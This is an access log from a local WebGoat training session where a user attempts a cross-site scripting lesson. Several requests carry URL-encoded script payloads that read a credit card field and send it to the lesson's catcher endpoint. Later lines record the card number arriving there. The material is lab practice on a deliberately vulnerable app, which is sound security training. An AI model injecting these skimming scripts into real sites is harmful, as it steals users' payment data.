0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+++++var+myButton+%3D+document.getElementsByName(%22buy%22)%5B0%5D%3B+++++function+myCardFunction()%7B+%09%09var+cardNum+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B%09%09+%09%09console.log(%22The+card+number+entered+is+%22+%2B+cardNum)%3B+%09%09window.location.href+%3D+%27http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%27+%2B+cardNum%3B+%09%7D+++++myButton.addEventListener(%22click%22%2C+myCardFunction)%3B+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 3415 http-bio-2210-exec-8 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-5 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-1 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:05 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:06 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-3 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-10 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-2 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-2 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 27
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-7 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-5 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-7 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-2 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:07 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-7 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+++++XssImage+%3D+new+Image%3B+++++XssImage.src+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22+%2B+document.form.input1.value%3B+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 2949 http-bio-2210-exec-7 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-7 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-5 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:27 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-7 18
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-7 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-5 25
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-7 34
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 42
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-6 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-7 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-6 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:29 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-2 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-5 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-6 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-2 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-7 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-6 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-3 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-7 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:30 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-2 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:06:54 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-1 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:06:54 -0400] GET /favicon.ico HTTP/1.1 404 - http-bio-2210-exec-1 0
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:07:01 -0400] GET /WebGoat/js/libs/underscore-min.map HTTP/1.1 404 1019 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:07:01 -0400] GET /WebGoat/js/libs/backbone-min.map HTTP/1.1 200 28133 http-bio-2210-exec-5 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:07 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:07 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-9 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-4 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:08 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 26
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-4 28
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 0
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-6 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:10 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-2 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-2 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-2 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-8 18
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-10 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-2 24
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2709 http-bio-2210-exec-8 40
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-7 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-7 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:08:14 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-8 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-6 23
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-5 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-6 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-10 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-3 28
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-6 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-5 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-6 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 20
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-3 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-6 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-6 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 20
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-6 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-3 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-6 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:53 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:56 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3Cscript%3E+++++document.getElementsByName(%22input2%22)%5B0%5D.value+%3D+%22000%22%3B+++++document.getElementsByName(%22buy%22)%5B0%5D.addEventListener(%27click%27%2C+function()+%7B+++++++++var+cardnumber+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B+++++++++var+url+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolen-credit-card%3D%22+%2B+cardnumber%3B+++++++++var+xhttp+%3D+new+XMLHttpRequest()%3B+++++++++xhttp.open(%22POST%22%2C+url%2C+false)%3B+++++++++xhttp.send()%3B+++++%7D)%3B+++++document.getElementById(%22message%22).innerHTML%3D%22%22%3B+%3C%2Fscript%3E&buy=Buy HTTP/1.1 200 3633 http-bio-2210-exec-3 234
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:11:57 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 2
